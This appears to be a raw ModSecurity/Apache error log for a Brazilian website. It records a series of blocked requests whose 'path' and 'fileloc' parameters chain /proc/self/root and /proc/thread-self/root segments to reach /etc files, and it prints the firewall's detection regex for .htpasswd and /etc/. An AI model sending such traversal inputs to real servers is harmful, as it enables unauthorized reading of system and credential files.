[Tue Mar 17 10:43:32.856223 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.243.203:41448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablahJqmL8PQht4WJFlOzgAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:34.193021 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:41456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablahgeiSKl8TjouI-YInAAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:35.428114 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.243.203:41472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablah64xEDsg_V3ESNY6wgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:37.855454 2026] [:error] [pid 18709:tid 140411632822016] [client 74.7.243.203:41476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaiTarLhPAjZGI1b21GwAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:41.959302 2026] [:error] [pid 18709:tid 140411599251200] [client 74.7.243.203:41476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablajTarLhPAjZGI1b21HwAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:49.397993 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.203:42706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablalKBJNF7axNlVR0UD1wAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:50.796064 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.243.203:55628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaltCmCSWTlPouqorThQAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:52.165479 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.243.203:55630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablamJqmL8PQht4WJFlO1QAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:44:17.618938 2026] [:error] [pid 18604:tid 140411565680384] [client 74.7.244.31:33160] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablasUBd0UqwxWindINvRQAAA1U"]
[Tue Mar 17 10:44:35.502679 2026] [:error] [pid 18709:tid 140411632822016] [client 74.7.243.203:55632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablawzarLhPAjZGI1b21RAAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:44:36.823153 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.243.203:52678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaxO82sZHvlq4xgHrKfQAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:44:41.201640 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:35688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaydCmCSWTlPouqorTjQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:44:43.044633 2026] [:error] [pid 18604:tid 140411641214720] [client 74.7.243.203:52684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablay0Bd0UqwxWindINvUgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:44.408758 2026] [:error] [pid 1731:tid 140411716749056] [client 74.7.243.203:39444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablazAb2qCuy5irgBMjPgQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:46.811503 2026] [:error] [pid 18709:tid 140411607643904] [client 74.7.243.203:39456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablazjarLhPAjZGI1b21SgAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:48.610139 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.241.46:35688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla0NCmCSWTlPouqorTlAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:44:51.532201 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:39464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla0weiSKl8TjouI-YI4gAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:52.830935 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.203:42722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla1K4xEDsg_V3ESNY63AAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:55.250572 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.243.203:42736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla1-82sZHvlq4xgHrKjQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:56.567497 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:42738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla2O82sZHvlq4xgHrKjgAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:57.761245 2026] [:error] [pid 1731:tid 140411565680384] [client 74.7.243.203:42750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla2Qb2qCuy5irgBMjPggAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:44:59.093066 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:42762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla29CmCSWTlPouqorTlgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
